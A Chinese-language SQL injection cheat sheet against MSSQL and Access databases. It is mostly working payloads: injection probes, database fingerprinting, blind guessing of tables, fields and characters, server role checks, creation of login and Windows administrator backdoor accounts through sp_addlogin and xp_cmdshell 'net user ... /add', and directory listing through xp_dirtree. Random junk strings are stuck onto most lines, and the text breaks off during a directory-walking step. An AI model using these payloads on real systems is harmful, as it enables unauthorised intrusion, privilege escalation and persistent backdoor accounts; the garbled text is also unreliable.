1.判断是否有注入;and 1=1 ;and 1=2 -/dEsgO
2.初步判断是否是mssql ;and user>0 o}'bv
Ei3zBS?J)
3.注入参数是字符'and [查询条件] and ''=' ia{c
NLe}Jqp
4.搜索时没过滤参数的'and [查询条件] and '%25'=' %=<IGce
(9mM kU=
5.判断数据库系统 lE
;jCN
gbSt Ar.
;and (select count(*) from sysobjects)>0 mssql A+wv-~3
o1OBwPj
;and (select count(*) from msysobjects)>0 access Gy Qm/I
~;OYtz
25|8nfeC5
cj|*_}
6.猜数据库 ;and (select Count(*) from [数据库名])>0 u%d K ig
$7Mtt.d6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 w$5A|%Y+V}
PS" .R_"
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 daAyx-
TfZ6F8|B
9.(1)猜字段的ascii值(access) MZSxQ8
JH]K/sC>
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |m?vVLq
2~p[7?sp'
(2)猜字段的ascii值(mssql) q 'a
"?GebA
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 qG9+/u)\
F{\gc|!i
10.测试权限结构(mssql) 0ZPV'`KGp
0i8hI6d
oXt,e
>Dg#9
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =`C4qC_
,Ci/xnI
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- A?"h@-~2
UU}7U]9u
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- E}Xka1 Bn
N(3R|Ii
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- =vh8T\
%YlTF\-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- MYnH2w]
VnJMmMM
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "x&C5l}n
2vKx]w
;and 1=(select IS_MEMBER('db_owner'));-- >1irSUj"~
F[7x*-NO-
bT!($?GNdg
B7-RU<n
11.添加mssql和系统的帐户 9f}XRz
)06iV
;exec master.dbo.sp_addlogin username;-- 4*UP.r@
;exec master.dbo.sp_password null,username,password;-- :PnSQjV:
N\1/JW+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- h:Ndzp{
;<G<1+
;exec master.dbo.xp_cmdshell 'net user username password ;+I4&VieK
vV`|!5x
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- C;\VO)]t
Y5!b)vke
;exec master.dbo.xp_cmdshell 'net user username password /add';-- |AH@ EI>
re,.@${H
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- _NdLcpBT?
vU/ D7
FX,$_:f6Y
_8h8Wtif
12.(1)遍历目录 C@HD(..#
c8QnN:n
;create table dirs(paths varchar(100), id int) K{}4zuZ
5>ST"l_ca
;insert dirs exec master.dbo.xp_dirtree 'c:\' GG'Sp53GE
N^elVu4 K
;and (select top 1 paths from dirs)>0 d\XRUO[
i&@,5/'-_O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ^ZQCIS-R
LEc8NQs
8gmn6dCf
eZO9GMO
(2)遍历目录 %f[Ep 3D
D?+
RJs
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >4![&